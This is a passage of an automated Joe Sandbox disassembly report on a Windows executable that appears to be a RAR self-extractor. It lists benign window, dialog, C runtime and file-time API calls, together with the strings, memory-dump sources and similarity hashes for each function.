SetDlgItemTextW.USER32(?,00BFD154,?), ref: 00BCD7FB
GetWindowRect.USER32(?,?), ref: 00BCD835
GetClientRect.USER32(?,?), ref: 00BCD841
GetWindowLongW.USER32(?,000000F0), ref: 00BCD8DF
GetWindowRect.USER32(?,?), ref: 00BCD90C
SetWindowTextW.USER32(?,?), ref: 00BCD94F
GetSystemMetrics.USER32(00000008), ref: 00BCD957
GetWindow.USER32(?,00000005), ref: 00BCD962
GetWindowRect.USER32(00000000,?), ref: 00BCD98F
GetWindow.USER32(00000000,00000002), ref: 00BCDA01

Strings

CAPTION, xrefs: 00BCD931
d, xrefs: 00BCD861
$%s:, xrefs: 00BCD76E

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: fc4bae9b08425f279dabc7f96f800e6a2db956c35f28e83dfd220fe534a28c85
Instruction ID: db33e139f8ed24f0aadc9ec4dbbec532c9a9905f182e00a84a89462f96521b35
Opcode Fuzzy Hash: fc4bae9b08425f279dabc7f96f800e6a2db956c35f28e83dfd220fe534a28c85
Instruction Fuzzy Hash: A6818D72508345AFD710DF68CC89F6FBBE9EB88704F04492DFA85A7291D670E909CB52

Function 00BEB7DF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BEB823

Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB3DB
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB3ED
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB3FF
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB411
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB423
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB435
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB447
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB459
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB46B
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB47D
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB48F
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB4A1
Part of subcall function 00BEB3BE: _free.LIBCMT ref: 00BEB4B3

_free.LIBCMT ref: 00BEB818

Part of subcall function 00BE7AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?), ref: 00BE7ADC
Part of subcall function 00BE7AC6: GetLastError.KERNEL32(?,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?,?), ref: 00BE7AEE

_free.LIBCMT ref: 00BEB83A
_free.LIBCMT ref: 00BEB84F
_free.LIBCMT ref: 00BEB85A
_free.LIBCMT ref: 00BEB87C
_free.LIBCMT ref: 00BEB88F
_free.LIBCMT ref: 00BEB89D
_free.LIBCMT ref: 00BEB8A8
_free.LIBCMT ref: 00BEB8E0
_free.LIBCMT ref: 00BEB8E7
_free.LIBCMT ref: 00BEB904
_free.LIBCMT ref: 00BEB91C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6f4303923d36a9a29988c0b2032a305502b8aaf187eb800519dacf99900da723
Instruction ID: 3f73cf89c87c7ed73fc014564db482ae18ec790a4d69ae643a750364b623c9e9
Opcode Fuzzy Hash: 6f4303923d36a9a29988c0b2032a305502b8aaf187eb800519dacf99900da723
Instruction Fuzzy Hash: EE313B31A04685AFEB30EA3AD849F5B73E9FF00350F1458A9E459D72A6DF35AD40CB50

Function 00BDA43C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

EndDialog.USER32(?,00000001), ref: 00BDA48C
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BDA4B9
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BDA4CE
SetWindowTextW.USER32(?,?), ref: 00BDA4DF
GetDlgItem.USER32(?,00000065), ref: 00BDA4E8
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BDA4FC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BDA50E
SetForegroundWindow.USER32(?), ref: 00BDA511

Strings

LICENSEDLG, xrefs: 00BDA450

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: MessageSend$ItemWindow$Text$DialogForeground
String ID: LICENSEDLG
API String ID: 3249366922-2177901306
Opcode ID: 5296dfdc7953b96a12b0050675d7f7b6db5b7e92924f2819f119de55c6dddcc3
Instruction ID: 91e11b5d50a06b956b896d798dcff0ce16347024b1df72fec801c6207a13d4d3
Opcode Fuzzy Hash: 5296dfdc7953b96a12b0050675d7f7b6db5b7e92924f2819f119de55c6dddcc3
Instruction Fuzzy Hash: 392171312042047BE6119B36EC89F7FBBADEB47B45F014059F601E72A0DB959911DA72

Function 00BDC399 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00BDC3BA
GetClassNameW.USER32(00000000,?,00000800), ref: 00BDC3E9

Part of subcall function 00BD1438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00BCADA2,?,?,?,00BCAD51,?,-00000002,?,00000000,?), ref: 00BD144E

GetWindowLongW.USER32(00000000,000000F0), ref: 00BDC407
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BDC41E
GetObjectW.GDI32(00000000,00000018,?), ref: 00BDC431

Part of subcall function 00BD95FF: GetDC.USER32(00000000), ref: 00BD960B
Part of subcall function 00BD95FF: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD961A
Part of subcall function 00BD95FF: ReleaseDC.USER32(00000000,00000000), ref: 00BD9628

Part of subcall function 00BD95BC: GetDC.USER32(00000000), ref: 00BD95C8
Part of subcall function 00BD95BC: GetDeviceCaps.GDI32(00000000,00000058), ref: 00BD95D7
Part of subcall function 00BD95BC: ReleaseDC.USER32(00000000,00000000), ref: 00BD95E5

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BDC458
DeleteObject.GDI32(00000000), ref: 00BDC45F
GetWindow.USER32(00000000,00000002), ref: 00BDC468

Strings

STATIC, xrefs: 00BDC3EF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 1444658586-1882779555
Opcode ID: 1c8347685cc27d8606c16bf705289c30f8689ef5e0ec28970f872a9a1ee568fe
Instruction ID: db433b83f7aef4408b7e6d85ddd78d6fb2c01a27bd643689c271da86836d92e0
Opcode Fuzzy Hash: 1c8347685cc27d8606c16bf705289c30f8689ef5e0ec28970f872a9a1ee568fe
Instruction Fuzzy Hash: D921F6725402157BEB216B649C4AFFFBAADDF14B00F004152FA05A7391EB744E41DAA4

Function 00BE847D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE8491

Part of subcall function 00BE7AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?), ref: 00BE7ADC
Part of subcall function 00BE7AC6: GetLastError.KERNEL32(?,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?,?), ref: 00BE7AEE

_free.LIBCMT ref: 00BE849D
_free.LIBCMT ref: 00BE84A8
_free.LIBCMT ref: 00BE84B3
_free.LIBCMT ref: 00BE84BE
_free.LIBCMT ref: 00BE84C9
_free.LIBCMT ref: 00BE84D4
_free.LIBCMT ref: 00BE84DF
_free.LIBCMT ref: 00BE84EA
_free.LIBCMT ref: 00BE84F8

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 43df8a32dd1313d1210b7c71ca8b6cc07180bff5a77e080872b87f61803179e4
Instruction ID: 629fa23e1486b2bcf6be2c7c10924996a11ed7b2ad7c95f37b60ce9f0dd24c98
Opcode Fuzzy Hash: 43df8a32dd1313d1210b7c71ca8b6cc07180bff5a77e080872b87f61803179e4
Instruction Fuzzy Hash: D911A276144148BFCB01EF96CA46CDD3BE5EF04350B0595A1BA088F236EB35EB509B80

Function 00BC20F7 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 00BC260F
;%u, xrefs: 00BC242C
xc%u, xrefs: 00BC266C

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 8030e8de1613bbdff1f0e9818f5dd0965adf55d6c1f99ce8cf07ff51891fa888
Instruction ID: 40c4d858f360e1cc9ba014456a5c25dcf108a897db1464ccae4779dac100eb79
Opcode Fuzzy Hash: 8030e8de1613bbdff1f0e9818f5dd0965adf55d6c1f99ce8cf07ff51891fa888
Instruction Fuzzy Hash: 70F108716043809BDB15EF2488D5FFE7BD5AF90300F0845FEF98A8B286DA649D45C762

Function 00BC9300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC9305
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BC9328
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BC9347

Part of subcall function 00BD1438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00BCADA2,?,?,?,00BCAD51,?,-00000002,?,00000000,?), ref: 00BD144E

_swprintf.LIBCMT ref: 00BC93E3

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

MoveFileW.KERNEL32(?,?), ref: 00BC9458
MoveFileW.KERNEL32(?,?), ref: 00BC9494

Strings

rtmp%d, xrefs: 00BC93CC

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: a939e37f7aefa340eda94ac6a6b5ca79e9a9e532bbab487a6fe195a3338f1d3b
Instruction ID: fa450f4070162fabbfce928c5e4fc7e163bd3480c1453d4b247f413bb3207294
Opcode Fuzzy Hash: a939e37f7aefa340eda94ac6a6b5ca79e9a9e532bbab487a6fe195a3338f1d3b
Instruction Fuzzy Hash: 16417E76911658A6EF20FBA08D49FEA73BCAF44381F0444EDB609E3241EA349B45CF64

Function 00BD892A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BD880B), ref: 00BD89FF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00BD8A20
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BD8A47

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00BD8979
<html>, xrefs: 00BD896E, 00BD89A7
utf-8"></head>, xrefs: 00BD8984
</html>, xrefs: 00BD89D1

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: 2f3d185e6e0c94d19335073d22ca6b1f21c688659b92df2ddbfc3d1ced9e2fbf
Instruction ID: 1854bd076c3c7b4f19689b6ebcaa9710e011ec50eb95aaf07892b11ae2764d7e
Opcode Fuzzy Hash: 2f3d185e6e0c94d19335073d22ca6b1f21c688659b92df2ddbfc3d1ced9e2fbf
Instruction Fuzzy Hash: 553110321043457EE314AB619C46F6FBBECDF61761F10419BF900962C2FF74AA0983A6

Function 00BD0708 Relevance: 12.1, APIs: 8, Instructions: 117timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00BD071B

Part of subcall function 00BCAA39: GetVersionExW.KERNEL32(?), ref: 00BCAA5E

FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00BD0744
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00BD0756
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BD0763
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BD0779
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BD0785
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BD07BB
__aullrem.LIBCMT ref: 00BD0845

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 614025ebf39e2f0e177ab2a0db54b6e494091e313a62c92ab3022eda5702bcce
Instruction ID: ad5e8420aefac81b14c1f83c3bc2194f5d0dc9a2e608a5bbfe745d0740cf7986
Opcode Fuzzy Hash: 614025ebf39e2f0e177ab2a0db54b6e494091e313a62c92ab3022eda5702bcce
Instruction Fuzzy Hash: 9E4119B24083059FC314DFA5C880A6BF7E8FB88714F004A2FF59692650E775E548DB95

Function 00BEE33D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BEEAB2,00000000,00000000,00000000,00000000,00000000,00BE401F), ref: 00BEE37F
__fassign.LIBCMT ref: 00BEE3FA
__fassign.LIBCMT ref: 00BEE415
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BEE43B
WriteFile.KERNEL32(?,00000000,00000000,00BEEAB2,00000000,?,?,?,?,?,?,?,?,?,00BEEAB2,00000000), ref: 00BEE45A
WriteFile.KERNEL32(?,00000000,00000001,00BEEAB2,00000000,?,?,?,?,?,?,?,?,?,00BEEAB2,00000000), ref: 00BEE493

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b5004c812332a7724228b0b8562bed4d6b7276c632979efcad92c495807e1bc9
Instruction ID: 174456ab194e78d734d5f245f821835f82f5ce608d75d4d644e3300c936b2e94
Opcode Fuzzy Hash: b5004c812332a7724228b0b8562bed4d6b7276c632979efcad92c495807e1bc9
Instruction Fuzzy Hash: 96519471A002499FDB10DFA9D885BEEBBF9EF09310F1441AAE565E7391E730E941CB60

Function 00BDBBB6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00BDBBCC
_swprintf.LIBCMT ref: 00BDBC00

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

SetDlgItemTextW.USER32(?,00000066,00C085FA), ref: 00BDBC20
_wcschr.LIBVCRUNTIME ref: 00BDBC53
EndDialog.USER32(?,00000001), ref: 00BDBD34

Strings

%s%s%u, xrefs: 00BDBBF5

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 8db02e5d11d2b981f34c02c5171ce3eac1832126fc343025b2dea6529579a54a
Instruction ID: 215e3dbd381f0049fa350e1991c8772ad2aaab38cc7a145a11f0d06d45e02454
Opcode Fuzzy Hash: 8db02e5d11d2b981f34c02c5171ce3eac1832126fc343025b2dea6529579a54a
Instruction Fuzzy Hash: 41412971900219AEEF259B60CD85FEEB7F9EB04304F0180E7E919E6251EF709A84CF54

Function 00BD9059 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00BD9072
GetWindowRect.USER32(?,00000000), ref: 00BD90B7
ShowWindow.USER32(?,00000005,00000000), ref: 00BD914E
SetWindowTextW.USER32(?,00000000), ref: 00BD9156
ShowWindow.USER32(00000000,00000005), ref: 00BD916C

Strings

RarHtmlClassName, xrefs: 00BD9118

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: a203793c88213336a739e93b9e3a8eb762ee94e66839237c14277ec6baab6d1f
Instruction ID: e096787fe6e37be199fce5cb6d9ef8be2cc10519b701615e1d468c1187d67a91
Opcode Fuzzy Hash: a203793c88213336a739e93b9e3a8eb762ee94e66839237c14277ec6baab6d1f
Instruction Fuzzy Hash: 58319F31404201EFCB219F64DC88F6BBBE9EF48701F00859AF94AA7256DB30D800CB61

Function 00BEB561 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BEB525: _free.LIBCMT ref: 00BEB54E

_free.LIBCMT ref: 00BEB5AF

Part of subcall function 00BE7AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?), ref: 00BE7ADC
Part of subcall function 00BE7AC6: GetLastError.KERNEL32(?,?,00BEB553,?,00000000,?,00000000,?,00BEB57A,?,00000007,?,?,00BEB977,?,?), ref: 00BE7AEE

_free.LIBCMT ref: 00BEB5BA
_free.LIBCMT ref: 00BEB5C5
_free.LIBCMT ref: 00BEB619
_free.LIBCMT ref: 00BEB624
_free.LIBCMT ref: 00BEB62F
_free.LIBCMT ref: 00BEB63A

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
Instruction ID: 75cb82f36d57ef21ca69c7f65f410e3173280c166badc667d249bf6061d7889a
Opcode Fuzzy Hash: 35f294bb21a7bd77ad2cd66a92d5d152bcc947fc6b4983fb665ce87d90ccf861
Instruction Fuzzy Hash: 67115171945B88BAD530FBB2DC0BFDB77ECAF04700F444865B29966066EB69F6044750

Function 00BE1694 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BE168B,00BDF0E2), ref: 00BE16A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BE16B0
